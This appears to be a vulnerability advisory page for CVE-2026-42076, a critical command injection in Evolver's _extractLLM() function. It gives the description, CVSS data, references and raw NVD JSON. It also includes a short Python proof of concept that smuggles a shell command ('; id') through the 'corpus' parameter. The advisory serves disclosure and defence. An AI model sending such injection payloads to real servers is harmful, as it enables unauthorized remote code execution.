CVE-2026-42076

Description

Evolver is a GEP-powered self-evolving engine for AI agents. Prior to version 1.69.3, a command injection vulnerability in the _extractLLM() function allows attackers to execute arbitrary shell commands on the server. The function constructs a curl command using string concatenation and passes it to execSync() without proper sanitization, enabling remote code execution when the corpus parameter contains shell metacharacters. This issue has been patched in version 1.69.3.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Evolver < 1.69.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC Concept for CVE-2026-42076
# The vulnerable endpoint expects a 'corpus' parameter that is passed to execSync via string concatenation.

import requests

target_url = "http://vulnerable-host/api/extract"

# Payload attempts to execute 'id' command via command injection
# Using semicolon to separate commands
malicious_payload = "http://safe-corp.com/data; id"

data = {
    "corpus": malicious_payload
}

try:
    response = requests.post(target_url, json=data)
    print(f"Status Code: {response.status_code}")
    print(f"Response Body: {response.text}")
except Exception as e:
    print(f"Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-42076
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-42076
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-42076/
[4] VulDB https://vuldb.com/cve/CVE-2026-42076
[5] https://github.com/EvoMap/evolver/releases/tag/v1.69.3
[6] https://github.com/EvoMap/evolver/security/advisories/GHSA-j5w5-568x-rq53
[7] https://github.com/EvoMap/evolver/security/advisories/GHSA-j5w5-568x-rq53

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-42076", "sourceIdentifier": "[email protected]", "published": "2026-05-04T17:16:24.440", "lastModified": "2026-05-07T15:46:40.943", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Evolver is a GEP-powered self-evolving engine for AI agents. Prior to version 1.69.3, a command injection vulnerability in the _extractLLM() function allows attackers to execute arbitrary shell commands on the server. The function constructs a curl command using string concatenation and passes it to execSync() without proper sanitization, enabling remote code execution when the corpus parameter contains shell metacharacters. This issue has been patched in version 1.69.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://github.com/EvoMap/evolver/releases/tag/v1.69.3", "source": "[email protected]"}, {"url": "https://github.com/EvoMap/evolver/security/advisories/GHSA-j5w5-568x-rq53", "source": "[email protected]"}, {"url": "https://github.com/EvoMap/evolver/security/advisories/GHSA-j5w5-568x-rq53", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}